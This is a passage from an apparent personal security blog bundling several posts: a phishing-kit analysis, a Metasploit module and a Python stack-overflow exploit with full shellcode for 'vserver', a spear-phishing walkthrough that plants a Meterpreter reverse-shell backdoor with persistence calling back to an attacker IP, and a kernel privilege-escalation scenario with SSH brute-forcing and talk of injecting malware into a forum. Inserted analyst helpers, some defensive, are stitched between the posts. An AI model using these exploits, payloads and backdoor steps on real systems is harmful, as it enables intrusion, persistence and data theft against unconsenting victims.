<a href="http://3.bp.blogspot.com/-GmfZRHd559E/T3rJp0JOSpI/AAAAAAAAAFc/D6QwE1ajonY/s1600/notepad_sourcecode2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="298" src="http://3.bp.blogspot.com/-GmfZRHd559E/T3rJp0JOSpI/AAAAAAAAAFc/D6QwE1ajonY/s640/notepad_sourcecode2.jpg" width="640" /></a></div>
<br />
The code has been converted from ASCII to hexadecimal escapes, and to reverse the process it uses the JavaScript function unescape.<br />
<br />
Once decoded, the most important thing to do was to find the "collector site", which must be the value of the action attribute of the form tag.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-gr8PAvRHT_I/T3r7nb_C3NI/AAAAAAAAAFk/SUUlNbub7ck/s1600/notepad_sourcecode4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-gr8PAvRHT_I/T3r7nb_C3NI/AAAAAAAAAFk/SUUlNbub7ck/s1600/notepad_sourcecode4.jpg" /></a></div>
<br />
The downloaded page performs a POST request to <b>gogeamitu.com/soso/system.php</b> with all the sensitive information. This php script can act in several ways, but I think it does one of these things:<br />
<ul>
<li>Store the information in a database on the same server</li>
<li>Send the information to a remote database or to another web page</li>
<li>Send an email to the spammers with all the information</li>
</ul>
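An added analyst helper for the encoded attachments described above (both the CartaSi one, whose FORM tag was encoded, and this Poste Italiane one); it is my code, not from the post or from the phishing kits. It reverses the JavaScript unescape() hex encoding, also handling the %uXXXX form, and pulls out every form action, i.e. the collector site. The sample attachment, the collector.example host and all function names are constructed.

```python
import re
import html

# document.write(unescape("...")) is the idiom these attachments use to hide
# the form markup; group 2 is the escaped payload (single or double quoted).
UNESCAPE_CALL_RE = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.DOTALL)
# JavaScript unescape() understands both %XX and %uXXXX sequences.
ESCAPE_SEQ_RE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")
# action attribute of a <form> tag, quoted or unquoted.
FORM_ACTION_RE = re.compile(
    r"<form\b[^>]*?\baction\s*=\s*([\"']?)([^\"'\s>]+)\1",
    re.IGNORECASE | re.DOTALL,
)

# Constructed sample modelled on the attachment described above (not the real
# file): a visible decoy comment plus the hex-escaped form injected via
# document.write(unescape(...)), closed by a second, single-quoted call.
SAMPLE_ATTACHMENT = """<html><body>
<!-- source code not available -->
<script type="text/javascript">
document.write(unescape("%3Cform%20method%3D%22post%22%20action%3D%22http%3A%2F%2Fcollector.example%2Fsoso%2Fsystem.php%22%3E"));
</script>
<input name="username"><input name="password" type="password">
<script>document.write(unescape('%3C%2Fform%3E'));</script>
</body></html>"""


def js_unescape(s):
    """Reverse JavaScript's unescape(): %uXXXX -> code point, %XX -> Latin-1 char."""
    def repl(m):
        if m.group(1):
            return chr(int(m.group(1), 16))
        return chr(int(m.group(2), 16))
    return ESCAPE_SEQ_RE.sub(repl, s)


def decode_obfuscated_html(page):
    """Replace every unescape("...") call in `page` by its decoded content.

    Applied until nothing changes, so a payload that itself contains another
    unescape(...) layer is unwrapped as well.
    """
    prev, text = None, page
    while prev != text:
        prev = text
        text = UNESCAPE_CALL_RE.sub(lambda m: js_unescape(m.group(2)), text)
    return text


def find_form_actions(page):
    """Return the action URLs of all <form> tags once the page is decoded."""
    decoded = decode_obfuscated_html(page)
    return [html.unescape(m.group(2)) for m in FORM_ACTION_RE.finditer(decoded)]


if __name__ == "__main__":
    for url in find_form_actions(SAMPLE_ATTACHMENT):
        print("collector:", url)
```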
<br />
To find out whether this site has been compromised or is the spammer's own server, we take a look at the domain through a whois service (like the previous one).<br />
<br />
Domain details:<br />
<ul>
<li>Record created: 21 February 2012</li>
<li>Record expires: 21 February 2013</li>
<li>Registration service provider: Aruba S.p.A.</li>
</ul>
<div>
Again some details are omitted, and in this case too the owner's details are fully visible. This domain was registered only one month ago, but this time it is linked, so I can check the web cache of various search engines.<br />
<br />
Current home page.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-tmwQDw-1b3I/T3t0MwPwUSI/AAAAAAAAAGU/_k0fVkoFDIk/s1600/this_is_not_possible.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="75" src="http://4.bp.blogspot.com/-tmwQDw-1b3I/T3t0MwPwUSI/AAAAAAAAAGU/_k0fVkoFDIk/s400/this_is_not_possible.JPG" width="400" /></a></div>
<br />
I found the cached page only on Google, and it was taken on the 28th of March; this is too far from the registration date to say that it has never changed. Another interesting thing is the domain name <b>gogeamitu</b>, which is the name of an old Romanian boxer, <a href="http://en.wikipedia.org/wiki/Gogea_Mitu">Gogea Mitu</a>; maybe this is a clue about the spammers' nationality?<br />
<br />
The visible content of system.php is shown below; it consists of only one line, which redirects the victim to poste.it.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-0TIh09joB7Y/T3r9MW8-oDI/AAAAAAAAAFs/uy6aBldls3s/s1600/redirect_poste.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-0TIh09joB7Y/T3r9MW8-oDI/AAAAAAAAAFs/uy6aBldls3s/s1600/redirect_poste.JPG" /></a></div>
<br />
In my opinion the spammers have paid one person to use his personal information to register gogeamitu and store (*) all the victims' details on this server; maybe once a day they retrieve the data and clean the db.<br />
<br />
* After doing other research on other phishing emails, he (I'm quite sure it is only one person) doesn't store the information in the db, but sends an email to his personal address.<br />
<br />
<b>Build Metasploit Module (Windows Exploit Development)</b> (published 2012-03-13, updated 2012-04-05)<br />
This is the continuation of my previous post <a href="http://security-obscurity.blogspot.com/2012/02/windows-exploit-development-remote.html">Windows Exploit Development (Remote Stack BoF)</a>.<br />
<br />
Let's try to convert the standalone exploit for vserver into a Metasploit module. If you think this task is complicated you're wrong: all we need is a template taken from <a href="http://www.corelan.be/index.php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/">this</a> Corelan tutorial, and to edit a few things.<br />
<br />
What we edit:<br />
<ul>
<li>Information details.</li>
<li>How much space we have for the shellcode (2062 bytes).</li>
<li>Bad chars.</li>
<li>Target machine, return address and offset.</li>
</ul>
<pre class="brush: rails">require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Vserver remote bof',
      'Description'    => %q{this is a description},
      'Author'         => [ 'SecurityObscurity' ],
      'Version'        => '$Revision: 1 $',
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'    => 2062,     # bytes available for the encoded payload
          'BadChars' => "\x00",   # bytes the encoder must avoid
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Windows 2003 Server R2 SP2',
            # return address to jump through and distance to the saved EIP
            { 'Ret' => 0x77384281, 'Offset' => 54 } ],
        ],
      'DefaultTarget'  => 0,
      'Privileged'     => false ))

    register_options(
      [
        Opt::RPORT(15000)
      ], self.class)
  end

  def exploit
    connect
    junk      = make_nops(target['Offset'])   # filler up to the saved return address
    eip       = [target.ret].pack('V')        # overwrite EIP, 32-bit little-endian
    nops      = make_nops(50)                 # small sled in front of the payload
    shellcode = payload.encoded
    sock.put(junk + eip + nops + shellcode)
    handler
    disconnect
  end
end</pre>
Once we have finished editing, we move the script into the most appropriate Metasploit modules subfolder and then start Metasploit. If we don't see errors at startup, it means the module was loaded successfully.<br />
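The four values edited in the module (Space, BadChars, Ret and Offset) are what tie the module to the standalone exploit. The following Python helper, an added example that is not part of the post or of Metasploit, packs the return address the way Ruby's <code>pack('V')</code> does, checks a payload against the Space and BadChars constraints, builds the same junk + eip + nops + payload layout, and splits a captured buffer back into its fields (useful when looking at a request in a capture). The function names are my own; plain 0x90 bytes stand in for make_nops(), which in Metasploit picks random single-byte NOP equivalents.

```python
import struct

# The four values the module above declares (taken from the post, not assumptions).
TARGET = {"Ret": 0x77384281, "Offset": 54}
PAYLOAD_SPACE = 2062
BAD_CHARS = b"\x00"


def pack_ret(addr):
    """Python equivalent of Ruby's [addr].pack('V'): 32-bit little-endian."""
    return struct.pack("<I", addr)


def find_bad_chars(payload, bad_chars=BAD_CHARS):
    """Return [(index, byte_value), ...] for every forbidden byte in payload."""
    return [(i, b) for i, b in enumerate(payload) if b in bad_chars]


def check_layout(payload, space=PAYLOAD_SPACE, bad_chars=BAD_CHARS):
    """Return a list of problems; an empty list means the payload fits the module."""
    problems = []
    if len(payload) > space:
        problems.append(f"payload is {len(payload)} bytes, Space allows {space}")
    bad = find_bad_chars(payload, bad_chars)
    if bad:
        problems.append(f"bad chars at offsets {[i for i, _ in bad]}")
    return problems


def build_buffer(payload, target=TARGET, sled=50, nop=b"\x90"):
    """Lay out junk + eip + nops + payload as the module's exploit method does.
    Assumption: a fixed 0x90 NOP instead of Metasploit's randomised make_nops()."""
    junk = nop * target["Offset"]
    eip = pack_ret(target["Ret"])
    nops = nop * sled
    return junk + eip + nops + payload


def split_buffer(buf, offset=TARGET["Offset"]):
    """Inverse of build_buffer for a captured request: (junk, eip_value, rest)."""
    if len(buf) < offset + 4:
        raise ValueError("buffer too short to reach the return address")
    eip_value = struct.unpack("<I", buf[offset:offset + 4])[0]
    return buf[:offset], eip_value, buf[offset + 4:]
```

pack_ret(0x77384281) yields b"\x81\x42\x38\x77", exactly the eip bytes hard-coded in the standalone Python exploit, which is the sanity check to run whenever the Ret value is edited.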
<br />
Now it's time to use it.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-t2b87fLTG4Q/T18XY_LIsvI/AAAAAAAAAEY/1YkKH8AdrE4/s1600/metasploit_module_use.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-t2b87fLTG4Q/T18XY_LIsvI/AAAAAAAAAEY/1YkKH8AdrE4/s1600/metasploit_module_use.jpg" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-_CBkWZZorjs/T18Wu2O4TeI/AAAAAAAAAEQ/MeCcB_geQnA/s1600/metasploit_module_options.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="399" src="http://1.bp.blogspot.com/-_CBkWZZorjs/T18Wu2O4TeI/AAAAAAAAAEQ/MeCcB_geQnA/s640/metasploit_module_options.jpg" width="640" /></a></div>
<br />
After setting the remote host and the payload, we launch the exploit to see if it works.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-BElhNflJmLA/T18YPlefeVI/AAAAAAAAAEo/pHmitxzhwHM/s1600/metasploit_module_exploit.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="168" src="http://1.bp.blogspot.com/-BElhNflJmLA/T18YPlefeVI/AAAAAAAAAEo/pHmitxzhwHM/s640/metasploit_module_exploit.jpg" width="640" /></a></div>
<br />
It works!<br />
<br />
<iframe allowfullscreen="" frameborder="0" height="360" src="http://www.youtube.com/embed/bvI541y4gFI" width="640"></iframe><br />
<br />
As you can see, it is very easy to convert a standalone exploit into a Metasploit module.<br />
<br />
Reference:<br />
<div style="text-align: left;">
- <a href="http://www.corelan.be/index.php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/">Exploit writing tutorial part 4: From Exploit to Metasploit - The Basics</a></div>
<br />
<b>Windows Exploit Development Remote Stack BoF</b> (published 2012-02-01, updated 2020-11-22)<br />
This time I made a video about the basic exploit development process on Windows. The target machine is a Windows Server 2003 R2 with DEP disabled, running a vulnerable piece of software called vserver.<br />
<br />
Basically, the vulnerable software listens on TCP port 15000 waiting for input, and if you provide a string longer than 15 characters it will crash.<br />
<br />
Here is vserver:<br />
- <a href="http://www.mediafire.com/?89haasml4vxhm0z">vserver download</a><br />
<br />
Exploit code:<br />
<pre class="brush:py;">#!/usr/bin/python
#
# Stack-based overflow PoC for vserver (TCP port 15000).
# Buffer layout: 54 bytes of filler, 4-byte return address, NOP sled, payload.
import socket

junk = b'A' * 54                 # filler up to the saved return address (offset 54)
eip = b'\x81\x42\x38\x77'        # 0x77384281 as little-endian bytes, overwrites EIP
nops = b'\x90' * 25              # small NOP sled in front of the payload
shellcode = b'\xbe\xb6\x17\xb0\xd8\xdd\xc0\xd9\x74\x24\xf4\x58\x33\xc9'
shellcode += b'\xb1\x4f\x83\xc0\x04\x31\x70\x10\x03\x70\x10\x54\xe2\x4c'
shellcode += b'\x30\x11\x0d\xad\xc1\x41\x87\x48\xf0\x53\xf3\x19\xa1\x63'
shellcode += b'\x77\x4f\x4a\x08\xd5\x64\xd9\x7c\xf2\x8b\x6a\xca\x24\xa5'
shellcode += b'\x6b\xfb\xe8\x69\xaf\x9a\x94\x73\xfc\x7c\xa4\xbb\xf1\x7d'
shellcode += b'\xe1\xa6\xfa\x2f\xba\xad\xa9\xdf\xcf\xf0\x71\xde\x1f\x7f'
shellcode += b'\xc9\x98\x1a\x40\xbe\x12\x24\x91\x6f\x29\x6e\x09\x1b\x75'
shellcode += b'\x4f\x28\xc8\x66\xb3\x63\x65\x5c\x47\x72\xaf\xad\xa8\x44'
shellcode += b'\x8f\x61\x97\x68\x02\x78\xdf\x4f\xfd\x0f\x2b\xac\x80\x17'
shellcode += b'\xe8\xce\x5e\x92\xed\x69\x14\x04\xd6\x88\xf9\xd2\x9d\x87'
shellcode += b'\xb6\x91\xfa\x8b\x49\x76\x71\xb7\xc2\x79\x56\x31\x90\x5d'
shellcode += b'\x72\x19\x42\xfc\x23\xc7\x25\x01\x33\xaf\x9a\xa7\x3f\x42'
shellcode += b'\xce\xd1\x1d\x0b\x23\xef\x9d\xcb\x2b\x78\xed\xf9\xf4\xd2'
shellcode += b'\x79\xb2\x7d\xfc\x7e\xb5\x57\xb8\x11\x48\x58\xb8\x38\x8f'
shellcode += b'\x0c\xe8\x52\x26\x2d\x63\xa3\xc7\xf8\x23\xf3\x67\x53\x83'
shellcode += b'\xa3\xc7\x03\x6b\xae\xc7\x7c\x8b\xd1\x0d\x0b\x8c\x46\x6e'
shellcode += b'\xa4\x10\x92\x06\xb7\x14\x31\xfb\x3e\xf2\x23\x14\x17\xad'
shellcode += b'\xdb\x8d\x32\x25\x7d\x51\xe9\xad\x1e\xc0\x76\x2d\x68\xf9'
shellcode += b'\x20\x7a\x3d\xcf\x38\xee\xd3\x76\x93\x0c\x2e\xee\xdc\x94'
shellcode += b'\xf5\xd3\xe3\x15\x7b\x6f\xc0\x05\x45\x70\x4c\x71\x19\x27'
shellcode += b'\x1a\x2f\xdf\x91\xec\x99\x89\x4e\xa7\x4d\x4f\xbd\x78\x0b'
shellcode += b'\x50\xe8\x0e\xf3\xe1\x45\x57\x0c\xcd\x01\x5f\x75\x33\xb2'
shellcode += b'\xa0\xac\xf7\xc2\xea\xec\x5e\x4b\xb3\x65\xe3\x16\x44\x50'
shellcode += b'\x20\x2f\xc7\x50\xd9\xd4\xd7\x11\xdc\x91\x5f\xca\xac\x8a'
shellcode += b'\x35\xec\x03\xaa\x1f'

sploit = junk + eip + nops + shellcode

print('[+] Data length: ' + str(len(sploit)) + ' bytes')
print('[+] Sending...\n')
print(sploit)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.2.9', 15000))   # target host and vserver port
s.send(sploit)
s.close()
print('\n[+] Ok')</pre>
I won't go into details because there is already an awesome tutorial by corelanc0d3r that explains the process of building a stack-based overflow exploit perfectly.<br />
<br />
You can find his tutorial <a href="https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/">here</a>.<br />
<br />
Enjoy the video.<br />
<br />
<iframe allowfullscreen="" frameborder="0" height="360" src="http://www.youtube.com/embed/ekazS--EYfM" width="640"></iframe><br />
<br />
~SecurityObscurity<br />
<br />
Reference:<br />
- <a href="https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/">Corelan Exploit Stack Based Overflows</a>
<br />
<b>Foxit Reader PDF Exploit + Windows 7 Backdoor</b> (published 2012-01-01, updated 2012-04-05)<br />
This video shows you how easy it is to install a backdoor (Meterpreter service) on a Windows 7 PC through a PDF, with the support of Metasploit.<br />
<br />
Our victim uses an outdated version of Foxit Reader (4.1.1), which is vulnerable to a <a href="http://www.exploit-db.com/exploits/15532/">stack-based buffer overflow</a>.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.exploit-db.com/wp-content/themes/exploit/screenshots/idlt16000/sudo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br />
<img border="0" height="297" src="http://www.exploit-db.com/wp-content/themes/exploit/screenshots/idlt16000/sudo.png" width="400" /></a></div>
<br />
Our goal is to install a backdoor on the victim's machine so we can access it whenever we want; to accomplish this we will use a bit of social engineering and a malicious PDF.<br />
<br />
First of all we open SET and select the type of attack; in this case it will be a spear-phishing attack, which allows you to craft e-mail messages and send them to a large (or small) number of people with a malicious file-format payload attached. Our exploit will be Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow, with a Windows Meterpreter reverse HTTPS payload set on port 44333.<br />
<br />
The next step is to craft our e-mail, telling him that something unusual is coming from his computer.<br />
<br />
E-mail text:<br />
<blockquote class="tr_bq">
<i>Dear Frank Victim, </i><br />
<br />
<i>To find out what happens to your computer run foxit reader as administrator and open Network Problems.pdf. </i><br />
<br />
<i>Best Regards.</i></blockquote>
Now it's time to send the email.<br />
<br />
When Frank opens the PDF a Meterpreter session is created, but with user privileges; to become local system we need to use the powerful script <b>getsystem</b>.<br />
<br />
<pre class="brush:plain;">meterpreter > getsystem -h
Usage: getsystem [options]
Attempt to elevate your privilege to that of local system.
OPTIONS:
-h Help Banner.
-t The technique to use. (Default to '0').
0 : All techniques available
1 : Service - Named Pipe Impersonation (In Memory/Admin)
2 : Service - Named Pipe Impersonation (Dropper/Admin)
3 : Service - Token Duplication (In Memory/Admin)
4 : Exploit - KiTrap0D (In Memory/User)</pre>
<br />
This script tries one or all of the techniques listed above to elevate our privileges from user to local system, so we can install the backdoor.<br />
<br />
Our backdoor is a Visual Basic script whose payload is a reverse TCP shell.<br />
<br />
<pre class="brush:plain;">meterpreter > run persistence -h
OPTIONS:
-A Automatically start a matching multi/handler to connect to the agent
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i The interval in seconds between each connection attempt
-p The port on the remote host where Metasploit is listening
-r The IP of the system running Metasploit listening for the connect back</pre>
If all went well, after a reboot the backdoor will try to reconnect every 30 seconds.<br />
<pre class="brush:plain;">meterpreter > run persistence -U -i 30 -p 44332 -r 192.168.2.21</pre>
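A fixed reconnect interval like the 30 seconds set with <code>-i 30</code> is also what gives the agent away on the network: its connections arrive at an almost constant cadence, while real browsing does not. The following Python script, an added example that is not part of the post or of Metasploit, groups outbound connections by flow and flags those whose inter-connection gaps are regular. The log lines are constructed for the example (192.168.2.21:44332 is the listener from the persistence command above; 203.0.113.10 is a documentation address standing in for ordinary traffic); the log format and function names are my own.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed outbound connection log (sample data, not taken from the post).
SAMPLE_LOG = """\
2012-01-01 10:00:00 192.168.2.5 -> 192.168.2.21:44332
2012-01-01 10:00:05 192.168.2.5 -> 203.0.113.10:443
2012-01-01 10:00:09 192.168.2.5 -> 203.0.113.10:443
2012-01-01 10:00:30 192.168.2.5 -> 192.168.2.21:44332
2012-01-01 10:01:00 192.168.2.5 -> 192.168.2.21:44332
2012-01-01 10:01:31 192.168.2.5 -> 192.168.2.21:44332
2012-01-01 10:02:00 192.168.2.5 -> 192.168.2.21:44332
2012-01-01 10:03:40 192.168.2.5 -> 203.0.113.10:443
2012-01-01 10:07:02 192.168.2.5 -> 203.0.113.10:443
"""


def parse_log(text):
    """Group connection timestamps by (source, destination) flow."""
    flows = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        date, time, src, _, dst = line.split()
        flows[(src, dst)].append(datetime.fromisoformat(f"{date} {time}"))
    return flows


def find_beacons(flows, min_connections=4, max_jitter=0.1):
    """Return {flow: mean_interval_seconds} for flows whose gaps between
    connections are regular: coefficient of variation (stdev / mean) <= max_jitter.
    A small jitter (here 29-31 s around 30 s) still counts as a beacon."""
    beacons = {}
    for flow, times in flows.items():
        if len(times) < min_connections:
            continue
        times = sorted(times)
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_jitter:
            beacons[flow] = round(avg, 1)
    return beacons


if __name__ == "__main__":
    for flow, interval in find_beacons(parse_log(SAMPLE_LOG)).items():
        print(f"possible beacon {flow[0]} -> {flow[1]} every {interval} s")
```

On the sample log only the flow to 192.168.2.21:44332 is reported, with a mean interval of 30 s; the browsing flow to 203.0.113.10 has gaps of 4, 211 and 202 seconds and is ignored. min_connections keeps one-off retries from being scored, and max_jitter is the knob to tune against your own baseline.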
<br />
<iframe allowfullscreen="" frameborder="0" height="360" src="http://www.youtube.com/embed/rAiAntoUwT4" width="640"></iframe><br />
As you can see it is very easy.<br />
<br />
Reference:<br />
- <a href="http://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training">Metasploit Unleashed</a>
<br />
<b>Ubuntu Server Exploit (Local Privilege Escalation)</b> (published 2011-12-07, updated 2012-04-04)<br />
Today we're going to talk about an "old" vulnerability discovered by Dan Rosenberg in the Linux kernel. This bug affects versions before 2.6.38 and allows a user with low privileges to gain root access.<br />
<br />
Link to the exploit: <a href="http://www.exploit-db.com/exploits/15704/">Linux Kernel <= 2.6.37 Local Privilege Escalation</a><br />
<br />
<div align="CENTER">
<a href="http://www.exploit-db.com/wp-content/themes/exploit/screenshots/idlt16000/screen-shot-2010-12-07-at-72005-pm.png"><img align="BOTTOM" border="0" height="284" name="immagini1" src="http://www.exploit-db.com/wp-content/themes/exploit/screenshots/idlt16000/screen-shot-2010-12-07-at-72005-pm.png" width="400" /></a></div>
<br />
The text below is taken from the exploit description.<br />
<pre class="brush: plain">* This exploit leverages three vulnerabilities to get root, all of which were
* discovered by Nelson Elhage:
*
* CVE-2010-4258
* -------------
* This is the interesting one, and the reason I wrote this exploit. If a
* thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL
* word will be written to a user-specified pointer when that thread exits.
* This write is done using put_user(), which ensures the provided destination
* resides in valid userspace by invoking access_ok(). However, Nelson
* discovered that when the kernel performs an address limit override via
* set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,
* etc.), this override is not reverted before calling put_user() in the exit
* path, allowing a user to write a NULL word to an arbitrary kernel address.
* Note that this issue requires an additional vulnerability to trigger.
*
* CVE-2010-3849
* -------------
* This is a NULL pointer dereference in the Econet protocol. By itself, it's
* fairly benign as a local denial-of-service. It's a perfect candidate to
* trigger the above issue, since it's reachable via sock_no_sendpage(), which
* subsequently calls sendmsg under KERNEL_DS.
*
* CVE-2010-3850
* -------------
* I wouldn't be able to reach the NULL pointer dereference and trigger the
* OOPS if users weren't able to assign Econet addresses to arbitrary
* interfaces due to a missing capabilities check.</pre>
<br />
<div style="text-align: center;">
<span style="font-size: large;"><b>VIDEO EXAMPLE</b></span></div>
<div style="text-align: left;">
<b>Scenario:</b></div>
<div style="text-align: left;">
<b>- Victim:</b> awesomeforum.dot (with Ubuntu Server 10.04, kernel 2.6.32)</div>
<div style="text-align: left;">
<b>- Attacker:</b> 192.168.2.13 (with BackBox 2)</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
This forum runs the latest version of the phpBB3 CMS, so there is no way to take advantage of any of its flaws.<br />
<br />
<div style="text-align: left;">
To start, we check the name of the forum administrator; if we are lucky it will be the same as the SSH account. This time we are lucky, and after a simple brute-force attack with Hydra we get john's password.<br />
<br /></div>
<div style="text-align: left;">
After the successful attack we log in and check whether the kernel version is vulnerable and whether gcc is present (by default all Linux distributions have it). Now it's time to upload the exploit through SFTP and execute it. After getting the root account we can inject JavaScript code into some phpBB3 files to spread malware, as happened to mysql.com a few months ago, or just install a rootkit.</div>
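The kernel-version check in the step above is worth doing carefully, because a `uname -r` string such as `2.6.32-21-generic` carries a distribution suffix that must be stripped before comparing against the 2.6.38 fix the post mentions. The following Python helper, an added example that is not part of the post or of the exploit, parses the release string and compares it to the fixed upstream version; the function names are my own. One caveat a practitioner needs: distribution kernels backport security fixes without bumping the upstream number, so a positive result from this check means "consult the package changelog", not "exploitable".

```python
import re

# Upstream version in which the bugs above were fixed, as stated in the post.
FIXED_VERSION = (2, 6, 38)

# major.minor with an optional patch level; anything after that (e.g. "-21-generic",
# ".59", "-4-amd64") is a distribution or stable-series suffix and is ignored.
_RELEASE_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?")


def parse_kernel_release(release):
    """Turn a `uname -r` string into a comparable (major, minor, patch) tuple."""
    match = _RELEASE_RE.match(release.strip())
    if not match:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    major, minor, patch = match.groups()
    return (int(major), int(minor), int(patch or 0))


def upstream_version_vulnerable(release, fixed=FIXED_VERSION):
    """True when the upstream version number is older than the fixed one.
    Distribution kernels backport fixes without changing this number, so this is
    a screening check: confirm against the distro's package changelog or advisory."""
    return parse_kernel_release(release) < fixed


def classify(release, fixed=FIXED_VERSION):
    """Human-readable verdict for a release string (used by the test below)."""
    if upstream_version_vulnerable(release, fixed):
        return "upstream version predates fix; verify distro backports"
    return "upstream version includes fix"
```

On the post's scenario, `parse_kernel_release("2.6.32-21-generic")` gives (2, 6, 32), which is older than (2, 6, 38), so the host is flagged for further verification.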
<br />
<iframe allowfullscreen="" frameborder="0" height="360" src="http://www.youtube.com/embed/Ia6OJAP-KS0" width="640"></iframe></div>
<br />
<b>Have fun with scammers</b> (published 2011-11-06, updated 2012-04-05)<br />
<div class="separator" style="clear: both; display: none; text-align: center;">
<a href="http://4.bp.blogspot.com/-i4Y6_wb0aR8/TvmUm0YZ5zI/AAAAAAAAAC4/yegWuxCwKXQ/s1600/umadbro.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-i4Y6_wb0aR8/TvmUm0YZ5zI/AAAAAAAAAC4/yegWuxCwKXQ/s1600/umadbro.jpg" /></a></div>
A couple of days ago I received this e-mail:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-L54sy-LDYZ0/TrbS8SrIXBI/AAAAAAAAACE/fweHcbyIfck/s1600/1_obs.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-L54sy-LDYZ0/TrbS8SrIXBI/AAAAAAAAACE/fweHcbyIfck/s1600/1_obs.jpg" /></a></div>
<br />
After reading it I decided to go on and have some fun with him, so I replied, and after one day I got the response.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-EAbgCI_2fR4/TrLsZhmwgxI/AAAAAAAAABM/mIX2NbGe2nw/s1600/2_obs.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-EAbgCI_2fR4/TrLsZhmwgxI/AAAAAAAAABM/mIX2NbGe2nw/s1600/2_obs.jpg" /></a></div>
<br />
To convince me he attached four pictures of the flat. Here are the living room and my future bedroom.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-COVGD7RNpJY/Tra-q07MfKI/AAAAAAAAABk/FbFvt_3jcZY/s1600/bedroom3.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"> <img border="0" src="http://3.bp.blogspot.com/-COVGD7RNpJY/Tra-q07MfKI/AAAAAAAAABk/FbFvt_3jcZY/s1600/bedroom3.jpg" /></a><a href="http://1.bp.blogspot.com/-93ndGhJkl18/Tra9c9HgeAI/AAAAAAAAABc/pJAprsNtAWs/s1600/Living+Room.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-93ndGhJkl18/Tra9c9HgeAI/AAAAAAAAABc/pJAprsNtAWs/s1600/Living+Room.jpg" /></a></div>
<br />
<br />
Anyone can see that this picture is from a five-star hotel, but to be really sure I used Google search by image, and what did I find? That these images are from a hotel in the center of Milan.<br />
<br />
Things were getting interesting, so I decided to find out how I could get this awesome flat.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-XmGBZU4DDvg/TrbBompHnQI/AAAAAAAAABs/JKU6egdzunk/s1600/3_obs.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-XmGBZU4DDvg/TrbBompHnQI/AAAAAAAAABs/JKU6egdzunk/s1600/3_obs.jpg" /></a></div>
<br />
His response.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-vO9iY2Bk8SU/TrbDBLUmF9I/AAAAAAAAAB0/JFQ5BOU7es8/s1600/4_obs.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-vO9iY2Bk8SU/TrbDBLUmF9I/AAAAAAAAAB0/JFQ5BOU7es8/s1600/4_obs.jpg" /></a></div>
<br />
Now it's time to send him my personal information in a PDF.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
